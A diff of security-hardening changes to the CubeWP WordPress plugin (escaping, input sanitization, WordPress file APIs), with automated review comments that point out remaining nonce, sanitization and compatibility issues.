+			<img class="cubewp-subscription-frame-bg" src="'.esc_url($background_image_src).'" alt="">
 			<div class="cubewp-subscription-main">
 				<div class="cubewp-subscription-form">
-					<div class="cube-subscription-header" style="background-image: url('.CWP_PLUGIN_URI.'cube/assets/admin/images/addon-pop-header@2x.png)">
-						<img class="subscription-header-super" src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/wp-super.png" alt="image">
+					<div class="cube-subscription-header" style="background-image: url('.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/addon-pop-header-2x.png').')">
+						<img class="subscription-header-super" src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/wp-super.png').'" alt="image">
 					</div>
 					<div class="cubewp-subscription-contant">
 						<div class="cubewp-subscription-logo">
-							 <img src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/cube-logo.svg" alt="">
+							 <img src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/cube-logo.svg').'" alt="">
 						</div>
 						<div class="cube-popup-title">
 							<h2>Unlock (8) Super Powerful Frontend Builders</h2>
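Review bot: the header background now points at `addon-pop-header-2x.png` instead of `addon-pop-header@2x.png`; unless the asset was renamed in the same release this is a broken image. The esc_html()/esc_url() wrapping of the interpolated values is correct, and `$page_header` in particular must stay escaped since it lands inside the H1.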
@@ -93,7 +93,7 @@
 								<span class="cube-award-option">Create Your Own Test Sandbox Powered by</span>
 							</div>
 							<div class="cubewp-logo">
-								<img src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/demowp.png" alt="">
+								<img src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/demowp.png').'" alt="">
 							</div>
 						</div>
 					</div>
--- a/cubewp-framework/cube/classes/class-cubewp-builder-ui.php
+++ b/cubewp-framework/cube/classes/class-cubewp-builder-ui.php
@@ -152,7 +152,7 @@
 		$groups = cwp_get_groups_by_post_type($post_type);
 		if (isset($groups) && !empty($groups) && count($groups) > 0) {
 			foreach ($groups as $group) {
-				$widgets_ui .= '<div id="group-' . rand(000000, 999999) . '" class="cubewp-builder-section cubewp-expand-container">';
+				$widgets_ui .= '<div id="group-' . wp_rand(000000, 999999) . '" class="cubewp-builder-section cubewp-expand-container">';
 				$widgets_ui .= '<div class="cubewp-builder-section-header">';
 				$widgets_ui .= '<h3>' . esc_html(get_the_title($group)) . '</h3>';
 				$widgets_ui .= '<a href="https://cubewp.com/cubewp-frontend-pro/" target="_blank"><span class="cubewp-pro-tag">' . esc_html__("PRO", "cubewp-framework") . '</span></a>';
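Review bot: `wp_rand(000000, 999999)` passes an octal literal that is simply 0; write `wp_rand( 0, 999999 )`. A random DOM id can also collide between groups; the group post ID (`$group`) would give a stable, unique `id="group-..."`.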
@@ -403,7 +403,7 @@
 		$options = self::$tab_options;
 		if (isset($options) && count($options) > 0) {
 			foreach ($options as $slug => $option) {
-				$output .= '<div id="type-' . esc_attr__($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr__($slug) . ' cubewp-tab-switcher-target">';
+				$output .= '<div id="type-' . esc_attr($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr($slug) . ' cubewp-tab-switcher-target">';
 				if (! $option["switcher"]) {
 					$output .= self::cubewp_builder_area_content($slug, $data);
 				} else {
@@ -412,7 +412,7 @@
 						foreach ($switcher["options"] as $id => $val) {
 							$data['content_switcher'] = $id;
 							$data_type = self::cubewp_check_switcher_type($id);
-							$output .= '<div id="plan-' . esc_attr__($id) . '" class="cubewp-plan-tab cubewp-switcher-tab-' . esc_attr__($id) . ' cubewp-tab-switcher-target" data-id="' . esc_attr__($id) . '" ' . $data_type . '>';
+							$output .= '<div id="plan-' . esc_attr($id) . '" class="cubewp-plan-tab cubewp-switcher-tab-' . esc_attr($id) . ' cubewp-tab-switcher-target" data-id="' . esc_attr($id) . '" ' . $data_type . '>';
 							$output .= self::cubewp_builder_area_content($slug, $data);
 							$output .= '</div>';
 						}
@@ -532,7 +532,7 @@
 		$options = self::$tab_options;
 		if (isset($options) && count($options) > 0) {
 			foreach ($options as $slug => $option) {
-				$output .= '<div id="type-' . esc_attr__($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr__($slug) . ' cubewp-tab-switcher-target">';
+				$output .= '<div id="type-' . esc_attr($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr($slug) . ' cubewp-tab-switcher-target">';
 				$output .= self::cubewp_builder_area_content($slug, $data);
 				$output .= '</div>';
 			}
--- a/cubewp-framework/cube/classes/class-cubewp-elementor.php
+++ b/cubewp-framework/cube/classes/class-cubewp-elementor.php
@@ -162,7 +162,8 @@
 				if (class_exists($class)) {
 					$widgets_manager->register(new $class());
 				}else {
-					wp_die(sprintf(esc_html__("%s Class Doesn't Exist.", "cubewp-framework"), $class));
+					/* translators: %s: class name. */
+					wp_die(sprintf(esc_html__("%s Class Doesn't Exist.", "cubewp-framework"), esc_html($class)));
 				}
 			}
 		}
--- a/cubewp-framework/cube/classes/class-cubewp-enqueue.php
+++ b/cubewp-framework/cube/classes/class-cubewp-enqueue.php
@@ -6,6 +6,8 @@
  * @package cubewp/cube/classes
  */

+// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }
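Review bot: the `// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals` has no matching `// phpcs:enable`, so the sniff is silenced for the remainder of the file rather than for the specific declarations that need it; add the enable after those declarations, or prefix the globals so no suppression is needed.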
@@ -80,7 +82,10 @@
 			}
 		}

-		echo apply_filters( 'frontend/script/enqueue', '' );
+		$cubewp_front_inline = apply_filters( 'frontend/script/enqueue', '' );
+		if ( ! empty( $cubewp_front_inline ) ) {
+			echo wp_kses_post( $cubewp_front_inline );
+		}
 		self::cubewp_enqueue_settings_css_js();

 	}
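Review bot: passing the result of the 'frontend/script/enqueue' filter through wp_kses_post() strips <script> tags, yet the filter name tells integrators it carries script markup, so any callback hooked to it to print inline scripts will silently stop working after this change; either document that the filter now carries HTML only, or route scripts through wp_add_inline_script() and keep wp_kses_post() for the remaining markup.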
@@ -359,9 +364,10 @@
 			  global $cwpOptions;
 			  $cwpOptions = ! empty( $cwpOptions ) && is_array( $cwpOptions ) ? $cwpOptions : get_option( 'cwpOptions' );
 			  $cubewp_css = isset( $cwpOptions['cubewp-css'] ) && ! empty( $cwpOptions['cubewp-css'] ) ? $cwpOptions['cubewp-css'] : '';
-			  echo '<style type="text/css">
-				 ' . $cubewp_css . '
-				</style>';
+			  if ( ! empty( $cubewp_css ) ) {
+				  // Attach custom CSS inline to a known handle to avoid raw echo.
+				  wp_add_inline_style( 'cwp-styles', $cubewp_css );
+			  }
 		   } );

 		   add_action( 'wp_footer', function(){
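Review bot: wp_add_inline_style( 'cwp-styles', $cubewp_css ) only produces output if the 'cwp-styles' handle is enqueued and has not been printed yet when this closure runs; if the handle goes out in the head and this action fires later, the custom CSS is silently dropped, so please verify on a default theme. Also note the change only relocates the output: the option value is still emitted verbatim inside a <style> element, so the 'cubewp-css' option must remain writable only by users who hold unfiltered_html.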
@@ -369,9 +375,10 @@
 			  $cwpOptions = ! empty( $cwpOptions ) && is_array( $cwpOptions ) ? $cwpOptions : get_option( 'cwpOptions' );
 			  $cubewp_js = isset( $cwpOptions['cubewp-js'] ) && ! empty( $cwpOptions['cubewp-js'] ) ? $cwpOptions['cubewp-js'] : '';
 			  wp_enqueue_script( 'jquery' );
-			  echo '<script type="text/javascript">
-				 ' . $cubewp_js . '
-				</script>';
+			  if ( ! empty( $cubewp_js ) ) {
+				  // Attach custom JS inline to jQuery handle to avoid raw echo.
+				  wp_add_inline_script( 'jquery', $cubewp_js );
+			  }
 		   } );
 		}
 	}
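Review bot: wp_enqueue_script( 'jquery' ) followed by wp_add_inline_script( 'jquery', $cubewp_js ) inside a wp_footer callback is too late on sites where jQuery has already been printed in the head, because inline scripts attached to a handle after it has been printed are not output; the custom JS stored in 'cubewp-js' would disappear. Attach it from wp_enqueue_scripts instead, or to a dedicated handle that is itself enqueued in the footer.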
--- a/cubewp-framework/cube/classes/class-cubewp-export.php
+++ b/cubewp-framework/cube/classes/class-cubewp-export.php
@@ -67,7 +67,7 @@
         <form class="export-form" method="post" action="">
             <input type="hidden" name="action" value="cwp_export_data">
             <input type="hidden" name="cwp_export_type" value="all">
-            <input type="hidden" name="cwp_export_nonce" value="<?php echo wp_create_nonce( 'cwp_export_data_nonce' ); ?>">
+            <input type="hidden" name="cwp_export_nonce" value="<?php echo esc_attr( wp_create_nonce( 'cwp_export_data_nonce' ) ); ?>">
             <div class="cubewp-import-box-container">
                 <div class="cubewp-import-box">
                     <div class="cubewp-import-card">
@@ -207,15 +207,15 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if ( !isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'cubewp-admin-nonce') ) {
+        if ( !isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'cubewp-admin-nonce') ) {
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('Invalid nonce. You are not authorized to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if(isset($_POST['export']) && $_POST['export'] == 'success'){
+        if(isset($_POST['export']) && sanitize_text_field(wp_unslash($_POST['export'])) == 'success'){
             $buffer = self::cwp_custom_fields_posts('cwp_user_fields');
             $files = self::cwp_file_names();
             if (self::cwp_file_force_contents($files['cwp_user_groups'], $buffer)) {
-                $download_now = isset( $_POST['download_now'] ) ? sanitize_text_field( $_POST['download_now'] ) : 'true';
+                $download_now = isset( $_POST['download_now'] ) ? sanitize_text_field( wp_unslash( $_POST['download_now'] ) ) : 'true';
                 if ( $download_now != 'false' ) {
                     self::cwp_create_zip_file();
                 }
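Review bot: the wp_die() after each wp_send_json() is unreachable, since wp_send_json() terminates the request itself; harmless, but it can go. Wrapping the nonce in sanitize_text_field( wp_unslash() ) before wp_verify_nonce() is fine, as the sanitizer cannot alter a valid hex token.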
@@ -238,11 +238,11 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if ( !isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'cubewp-admin-nonce') ) {
+        if ( !isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'cubewp-admin-nonce') ) {
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('Invalid nonce. You are not authorized to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if(isset($_POST['export']) && $_POST['export'] == 'success'){
+        if(isset($_POST['export']) && sanitize_text_field(wp_unslash($_POST['export'])) == 'success'){
             $buffer = self::cwp_custom_fields_posts('cwp_forms');
             $files = self::cwp_file_names();
             if (self::cwp_file_force_contents($files['cwp_custom_forms'], $buffer)) {
@@ -272,7 +272,7 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if ( !isset($_POST['cwp_export_nonce']) || !wp_verify_nonce($_POST['cwp_export_nonce'], 'cwp_export_data_nonce') ) {
+        if ( !isset($_POST['cwp_export_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['cwp_export_nonce'])), 'cwp_export_data_nonce') ) {
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('Invalid nonce. You are not authorized to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
@@ -285,6 +285,7 @@
 				));
 			} else {
 				$export_content = array();
+                /* phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized */
 				foreach ($_POST['cwp_export_content_type'] as $content_type) {
 					switch ($content_type) {
 						case 'post_types':
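Review bot: the phpcs:ignore on the foreach over $_POST['cwp_export_content_type'] suppresses the warning without addressing it: there is no isset()/is_array() guard, so a request missing that field (or sending a scalar) triggers a PHP warning in foreach, and each $content_type reaches the switch unsanitized. Guard with is_array() and map the values through sanitize_key() before the loop; the fixed case labels then bound what is accepted.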
@@ -398,11 +399,11 @@
         $post_cards_dir = $upload_dir['basedir'] . '/cubewp-post-cards';

         if (!is_dir($export_path)) {
-            mkdir($export_path, 0755, true); // Ensure export directory exists
+            wp_mkdir_p( $export_path );
         }

         if (file_exists($export_path . $DelFilePath)) {
-            unlink($export_path . $DelFilePath);
+            wp_delete_file($export_path . $DelFilePath);
         }

         if ($zip->open($export_path . $DelFilePath, ZIPARCHIVE::CREATE) !== TRUE) {
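Review bot: wp_mkdir_p( $export_path ) and wp_delete_file() are the right replacements, but the return value of wp_mkdir_p() is not checked; if the export directory cannot be created the failure only surfaces later as an opaque ZipArchive open error. Bail out with an explicit error when wp_mkdir_p() returns false.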
@@ -414,8 +415,8 @@
         $zip->addFile($files['cwp_post_groups'], 'cwp_post_groups.json');
         $zip->addFile($files['cwp_user_groups'], 'cwp_user_groups.json');
         $zip->addFile($files['cwp_custom_forms'], 'cwp_custom_forms.json');
-
-        $export_post_cards = isset($_POST['export_post_cards']) ? sanitize_text_field($_POST['export_post_cards']) : 'false';
+        /*phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Missing */
+        $export_post_cards = isset($_POST['export_post_cards']) ? sanitize_text_field(wp_unslash($_POST['export_post_cards'])) : 'false';
         // Add "cubewp-post-cards" to the zip archive
         if ($export_post_cards == 'true' && is_dir($post_cards_dir)) {
             $this->add_post_cards_folder_to_zip($post_cards_dir, $zip, 'cubewp-post-cards');
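Review bot: the phpcs:ignore for NonceVerification on $_POST['export_post_cards'] is only safe because this routine is reached from handlers that already verified 'cubewp-admin-nonce' (cwp_create_zip_file() is called after that check above); state that precondition in the method docblock, otherwise a future direct caller inherits an unchecked $_POST read.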
@@ -425,10 +426,10 @@
         $zip->close();

         // Cleanup temporary files
-        unlink($files['setup_file']);
-        unlink($files['cwp_post_groups']);
-        unlink($files['cwp_user_groups']);
-        unlink($files['cwp_custom_forms']);
+        wp_delete_file($files['setup_file']);
+        wp_delete_file($files['cwp_post_groups']);
+        wp_delete_file($files['cwp_user_groups']);
+        wp_delete_file($files['cwp_custom_forms']);
     }

     /**
@@ -464,11 +465,11 @@
      * Method cwp_file_force_contents
      *
      * @param string $file_path
-     * @param Json $file_content
-     * @param bolean $flags
+     * @param string $file_content
+     * @param int $flags
      * @param int $permissions
      *
-     * @return Json
+     * @return boolean
 	 * @since  1.0.0
      */
     private static function cwp_file_force_contents($file_path, $file_content, $flags = 0, $permissions = 0777) {
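Review bot: the docblock now says `@return boolean`, but the method returns the result of file_put_contents(), which is the number of bytes written or false; `@return int|false` would be accurate, and callers that test the result for truthiness should know that writing an empty string yields 0.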
@@ -476,8 +477,9 @@
 		array_pop($parts);
 		$dir = implode('/', $parts);

-		if ( ! is_dir($dir)) {
-			mkdir($dir, $permissions, true);
+		if ( ! is_dir( $dir ) ) {
+			// Use WordPress API to create directories recursively.
+			wp_mkdir_p( $dir );
 		}

 		return file_put_contents($file_path, $file_content, $flags);
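Review bot: after switching to wp_mkdir_p( $dir ) the $permissions parameter, still defaulting to 0777 in the signature, is no longer used anywhere in the method; drop it so the world-writable default does not mislead readers. The return of wp_mkdir_p() is unchecked here as well, so a failed directory creation only shows up as a file_put_contents() warning.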
--- a/cubewp-framework/cube/classes/class-cubewp-form-builder.php
+++ b/cubewp-framework/cube/classes/class-cubewp-form-builder.php
@@ -30,17 +30,25 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        $form_relation = isset( $_POST['form_relation'] ) ? sanitize_text_field( $_POST['form_relation'] ) : '';
-        $form_type     = isset( $_POST['form_type'] ) ? sanitize_text_field( $_POST['form_type'] ) : '';
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
+        $form_relation = isset( $_POST['form_relation'] ) ? sanitize_text_field( wp_unslash( $_POST['form_relation'] ) ) : '';
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
+        $form_type     = isset( $_POST['form_type'] ) ? sanitize_text_field( wp_unslash( $_POST['form_type'] ) ) : '';
         if ( $form_type != '' ) {
             $cwp_forms = CWP()->get_form( $form_type );
             if ( isset( $form_relation ) && ! empty( $form_relation ) ) {
+                // phpcs:ignore WordPress.Security.NonceVerification.Missing
                 if ( isset( $_POST['cwpform'] ) && ! empty( $_POST['cwpform'] ) ) {

                     if ( $form_type == 'loop_builder' ) {
+                        /*phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing */
                         $cwp_forms[ $form_relation ] = apply_filters( 'cubewp/loop/builder/save', array() , $_POST['cwpform'], $form_relation );
                     }else {
-                        $cwp_forms[ $form_relation ] = CubeWp_Sanitize_Dynamic_Array( $_POST['cwpform'][ $form_relation ] );
+                        // phpcs:ignore WordPress.Security.NonceVerification.Missing
+                        if(isset($_POST['cwpform'][ $form_relation ])){
+                            /*phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing */
+                            $cwp_forms[ $form_relation ] = CubeWp_Sanitize_Dynamic_Array( $_POST['cwpform'][ $form_relation ] );
+                        }
                     }

                     CWP()->update_form( $form_type, $cwp_forms );
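Review bot: the added `phpcs:ignore WordPress.Security.NonceVerification.Missing` comments silence the sniff but do not add the check it is asking for: this handler reads $_POST and persists the result through CWP()->update_form() guarded only by the capability check above, which is exactly the state-change-without-nonce pattern the sniff flags. Verify a nonce (the 'cubewp-admin-nonce' used by the export handlers would do) before touching $_POST, and sanitize $_POST['cwpform'] in the loop_builder branch before handing it to the 'cubewp/loop/builder/save' filter rather than suppressing the InputNotSanitized sniff.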
@@ -66,10 +74,12 @@
             wp_die();
         }
         $section_args = [];
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
         if(isset($_POST['action'])){
-            unset($_POST['action']);
-            unset($_POST['section_id']);
+            unset($_POST['action']);// phpcs:ignore WordPress.Security.NonceVerification.Missing
+            unset($_POST['section_id']);// phpcs:ignore WordPress.Security.NonceVerification.Missing
         }
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
         if(isset($_POST['form_relation']) && isset($_POST['form_type'])){
             foreach($_POST as $key => $POST){
                 $section_args[$key] = $POST;
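Review bot: `foreach($_POST as $key => $POST){ $section_args[$key] = $POST; }` copies every POST key into $section_args unsanitized, and the added phpcs:ignore lines only cover the nonce sniff; build $section_args from an allowlist of expected keys with per-key sanitization instead of copying the whole superglobal. The trailing phpcs:ignore comments on the two unset() calls are also unnecessary, since unset() does not read input.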
@@ -91,7 +101,7 @@
      */
     public function cwpform_form_section( $args = array() ) {
         $defaults         = array(
-            'section_id'          => rand( 123456789, 111111111 ),
+            'section_id'          => wp_rand( 123456789, 111111111 ),
             'section_title'       => '',
             'section_description' => '',
             'section_type'        => '',
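Review bot: wp_rand() is the right call for a non-cryptographic section id, but the bounds are passed as ( 123456789, 111111111 ), i.e. max before min; write them in ascending order so the intended range is unambiguous rather than relying on the RNG to cope with reversed arguments.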
@@ -449,9 +459,9 @@
                 'name'        => 'display_ui',
                 'value'       => $appearance,
                 'options'     => array(
-                    'select'       => __( "Dropdown" ),
-                    'multi_select' => __( "Multi Dropdown" ),
-                    'checkbox'     => __( "checkbox" )
+                    'select'       => __( "Dropdown", "cubewp-framework" ),
+                    'multi_select' => __( "Multi Dropdown", "cubewp-framework" ),
+                    'checkbox'     => __( "checkbox", "cubewp-framework" )
                 ),
                 'extra_attrs' => 'data-name="display_ui"',
             );
@@ -463,7 +473,7 @@
                 'class'       => 'group-field field-select2_ui',
                 'name'        => 'select2_ui',
                 'value'       => isset( $field['select2_ui'] ) && ! empty( $field['select2_ui'] ) ? $field['select2_ui'] : '0',
-                'options'     => array( '0' => __( "No" ), '1' => __( "Yes" ) ),
+                'options'     => array( '0' => __( "No", "cubewp-framework" ), '1' => __( "Yes", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="select2_ui"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -485,7 +495,7 @@
                 'class'       => 'group-field field-select2_ui',
                 'name'        => 'select2_ui',
                 'value'       => isset( $field['select2_ui'] ) && ! empty( $field['select2_ui'] ) ? $field['select2_ui'] : '0',
-                'options'     => array( '0' => __( "No" ), '1' => __( "Yes" ) ),
+                'options'     => array( '0' => __( "No", "cubewp-framework" ), '1' => __( "Yes", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="select2_ui"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -559,7 +569,7 @@
                 'class'       => 'group-field field-required',
                 'name'        => 'required',
                 'value'       => isset( $field['required'] ) ? $field['required'] : $default_required,
-                'options'     => array( '1' => __( "Required" ), '0' => __( "Not required" ) ),
+                'options'     => array( '1' => __( "Required", "cubewp-framework" ), '0' => __( "Not required", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="required"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -597,7 +607,7 @@
                 'class'       => 'group-field field-sorting',
                 'name'        => 'sorting',
                 'value'       => isset( $field['sorting'] ) && ! empty( $field['sorting'] ) ? $field['sorting'] : '',
-                'options'     => array( '1' => __( "Yes" ), '0' => __( "No" ) ),
+                'options'     => array( '1' => __( "Yes", "cubewp-framework" ), '0' => __( "No", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="sorting"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -774,7 +784,7 @@
                         if(!empty($fields)){
                             foreach($fields as $input_attr){
                                 if($input_attr['type'] == 'hidden'){
-                                    echo call_user_func('cwp_render_hidden_input',$input_attr);
+                                    echo call_user_func('cwp_render_hidden_input', $input_attr); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
                                 }else{
                                     $field_type = $input_attr['type'];
                                     if(isset($input_attr['input_type']) && !empty($input_attr['input_type'])){
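Review bot: the `phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped` on echo call_user_func('cwp_render_hidden_input', $input_attr) is acceptable only if cwp_render_hidden_input() escapes every attribute it emits; put that guarantee in the ignore comment using the `-- reason` suffix already used elsewhere in this patch, so a reviewer does not have to chase the helper to validate the suppression.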
@@ -783,9 +793,9 @@
                                     ?>
                                     <div class="section-form-field">
                                         <?php if(isset($input_attr['label']) && !empty($input_attr['label'])){ ?>
-                                        <label for="section_class"><?php echo $input_attr['label']; ?></label>
+                                        <label for="section_class"><?php echo esc_html( $input_attr['label'] ); ?></label>
                                         <?php } ?>
-                                        <?php echo call_user_func('cwp_render_'.$field_type.'_input',$input_attr); ?>
+                                        <?php echo call_user_func( 'cwp_render_'.$field_type.'_input', $input_attr ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
                                     </div>
                                     <?php
                                 }
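Review bot: esc_html() on the label is correct, but call_user_func( 'cwp_render_'.$field_type.'_input', $input_attr ) builds a function name from $input_attr['type'] / $input_attr['input_type'] and the escape sniff is merely suppressed; add a function_exists() check or an allowlist of renderer types so an unexpected type degrades gracefully instead of fatally. Nit: every field's <label for="section_class"> points at the same id.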
--- a/cubewp-framework/cube/classes/class-cubewp-forms-pro.php
+++ b/cubewp-framework/cube/classes/class-cubewp-forms-pro.php
@@ -31,14 +31,14 @@
 		$page_header="CubeWP Forms";
 		$background_image_src = CWP_PLUGIN_URI.'cube/assets/admin/images/forms-templates.png';
 		echo'<div id="cubewp-title-bar">
-			<h1>'.$page_header.'</h1>
+			<h1>'.esc_html($page_header).'</h1>
 		</div>
 		<div class="cubewp-subscription-frame forms-templates" style="background:#f0f0f1 0% 0% no-repeat padding-box;">
-			<img class="cubewp-subscription-frame-bg" src="'.$background_image_src.'" alt="">
+			<img class="cubewp-subscription-frame-bg" src="'.esc_url($background_image_src).'" alt="">
 			<div class="cubewp-subscription-main">
 				<div class="cubewp-subscription-form">
 					<div class="cube-subscription-header forms-templates">
-						<img class="subscription-header-super" src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/forms.svg" alt="image">
+						<img class="subscription-header-super" src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/forms.svg').'" alt="image">
 					</div>
 					<div class="cubewp-subscription-contant forms-templates">
 						<div class="cubewp-subscription-logo">
--- a/cubewp-framework/cube/classes/class-cubewp-frontend-alerts.php
+++ b/cubewp-framework/cube/classes/class-cubewp-frontend-alerts.php
@@ -68,7 +68,10 @@
                             <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" fill="currentColor"  viewBox="0 0 16 16">
                               <path d="M12.854.146a.5.5 0 0 0-.707 0L10.5 1.793 14.207 5.5l1.647-1.646a.5.5 0 0 0 0-.708l-3-3zm.646 6.061L9.793 2.5 3.293 9H3.5a.5.5 0 0 1 .5.5v.5h.5a.5.5 0 0 1 .5.5v.5h.5a.5.5 0 0 1 .5.5v.5h.5a.5.5 0 0 1 .5.5v.207l6.5-6.5zm-7.468 7.468A.5.5 0 0 1 6 13.5V13h-.5a.5.5 0 0 1-.5-.5V12h-.5a.5.5 0 0 1-.5-.5V11h-.5a.5.5 0 0 1-.5-.5V10h-.5a.499.499 0 0 1-.175-.032l-.179.178a.5.5 0 0 0-.11.168l-2 5a.5.5 0 0 0 .65.65l5-2a.5.5 0 0 0 .168-.11l.178-.178z"/>
                             </svg>
-                            <?php echo sprintf(esc_html__('Edit this %s', 'cubewp-framework'), get_post_type_object( $post_type )->labels->singular_name) ?>
+                            <?php
+                            /* translators: %s: post type singular name. */
+                            echo sprintf( esc_html__( 'Edit this %s', 'cubewp-framework' ), esc_html( get_post_type_object( $post_type )->labels->singular_name ) );
+                            ?>
                         </button>
                     </a>
                 <?php } ?>
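Review bot: esc_html() around the singular name is correct, but get_post_type_object( $post_type ) returns null for an unregistered type and reading `->labels` on null is a fatal; guard the lookup. Style: printf( esc_html__( ... ), ... ) reads better than `echo sprintf( ... )` and is the form the WordPress sniffs expect.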
@@ -104,8 +107,10 @@

     public function cubewp_get_notification_msg(){
         $free_msg =  true;
+        // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
         if(isset($_GET['p']) && isset($_GET['post_type']) && !is_admin()) {
-            $post_id   =   wp_kses_post($_GET['p']);
+            // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
+            $post_id   =   wp_kses_post(wp_unslash($_GET['p']));
             $plan_id   =   get_post_meta($post_id, 'plan_id', true);
             if( $plan_id > 0 ) {
                 $plan_price =   get_post_meta($plan_id, 'plan_price', true);
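Review bot: wp_kses_post() is an HTML sanitizer, not an integer one, so `$post_id = wp_kses_post(wp_unslash($_GET['p']))` still passes an arbitrary non-numeric string into get_post_meta(); use absint() and bail when it yields 0. The phpcs:ignore itself is fine, as this branch only reads query vars to render a notice.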
@@ -115,9 +120,11 @@
             }
         }
         if( $free_msg ){
-            return sprintf(__('Your %s is pending for review.', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name);
+            /* translators: %s: post type singular name. */
+            return sprintf( __('Your %s is pending for review.', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name );
         }else{
-            return sprintf(__('Your %s is pending! Please proceed to make it published', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name);
+            /* translators: %s: post type singular name. */
+            return sprintf( __('Your %s is pending! Please proceed to make it published', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name );
         }

     }
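Review bot: $post_id is assigned only inside the `if(isset($_GET['p']) ...)` branch above, yet both return statements call get_post_type($post_id); when that branch is skipped this reads an undefined variable, and as with the edit button, get_post_type_object() can return null before `->labels` is dereferenced. Resolve the post type once, with a fallback label, before the if/else.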
--- a/cubewp-framework/cube/classes/class-cubewp-frontend-templates.php
+++ b/cubewp-framework/cube/classes/class-cubewp-frontend-templates.php
@@ -1,5 +1,4 @@
 <?php
-
 /**
  * CubeWp Frontend templates is for display of single post and archive templates
  *
@@ -7,6 +6,8 @@
  * @package cubewp/cube/classes
  */

+ // phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }
@@ -86,7 +87,7 @@
                     $hook = get_post_meta( $template_id, 'template_location', true );
                     $content_to_echo = CubeWp_Theme_Builder::do_cubewp_theme_builder('block', $template_id, true);
                     add_action( $hook, function() use ( $content_to_echo ) {
-                        echo $content_to_echo;
+                        echo wp_kses_post($content_to_echo);
                     });
                 }
             }
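Review bot: passing theme-builder block output through wp_kses_post() strips markup that builder templates commonly emit (form/input/select, iframe, inline SVG, script tags and on* handlers), so this is likely to visibly break existing templates rather than only harden them; if $content_to_echo is rendered from admin-authored templates, escape where untrusted data enters the template, or use wp_kses() with an allowlist matching what the builder actually renders.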
@@ -351,9 +352,11 @@
                 'author.php'
             );
         }elseif (is_search()) {
+            // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
             if ( isset( $_GET['post_type'] ) && !empty( $_GET['post_type'] ) ) {
                 // Sanitize the post_type value from the query string
-                $post_type = sanitize_text_field( $_GET['post_type'] );
+                // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
+                $post_type = sanitize_text_field( wp_unslash($_GET['post_type']) );

                 // Define the template array
                 $templates = array(
